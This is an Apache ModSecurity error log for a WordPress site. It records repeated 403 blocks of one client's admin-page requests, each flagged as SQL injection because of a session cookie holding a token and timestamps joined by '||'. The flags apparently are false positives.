[Mon May 11 18:32:18.894805 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEkjJnyuKVXoStDhbiQwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:18.895093 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEkjJnyuKVXoStDhbiQwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:19.595422 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEkjJnyuKVXoStDhbiQwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:19.879211 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEkzJnyuKVXoStDhbiRAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:19.879503 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEkzJnyuKVXoStDhbiRAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:20.420290 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEkzJnyuKVXoStDhbiRAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:20.536789 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIElDJnyuKVXoStDhbiRgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:20.537222 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIElDJnyuKVXoStDhbiRgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:21.117790 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIElDJnyuKVXoStDhbiRgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:21.263248 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIElTJnyuKVXoStDhbiSQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:21.263545 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIElTJnyuKVXoStDhbiSQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:21.627905 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIElTJnyuKVXoStDhbiSQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:21.885151 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIElTJnyuKVXoStDhbiTAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:21.885453 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIElTJnyuKVXoStDhbiTAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:22.502387 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIElTJnyuKVXoStDhbiTAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:22.789034 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEljJnyuKVXoStDhbiTQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:22.789337 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEljJnyuKVXoStDhbiTQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:23.532967 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEljJnyuKVXoStDhbiTQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:23.765370 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIElzJnyuKVXoStDhbiVQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:23.765655 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIElzJnyuKVXoStDhbiVQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:24.878009 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIElzJnyuKVXoStDhbiVQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:25.097625 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEmTJnyuKVXoStDhbiWQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:25.097920 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEmTJnyuKVXoStDhbiWQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:25.759520 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEmTJnyuKVXoStDhbiWQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:25.868949 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEmTJnyuKVXoStDhbiWwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:25.869237 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEmTJnyuKVXoStDhbiWwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:26.458778 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEmTJnyuKVXoStDhbiWwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:26.570180 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEmjJnyuKVXoStDhbiXAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:26.570469 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEmjJnyuKVXoStDhbiXAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:26.948111 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEmjJnyuKVXoStDhbiXAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:27.297545 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEmzJnyuKVXoStDhbiXQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:27.297851 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEmzJnyuKVXoStDhbiXQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:27.894390 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEmzJnyuKVXoStDhbiXQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:28.254653 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEnDJnyuKVXoStDhbiYAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:28.255015 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEnDJnyuKVXoStDhbiYAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:28.890498 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEnDJnyuKVXoStDhbiYAAAAFM"], referer: https://rentparadise.fr/wp-login.php
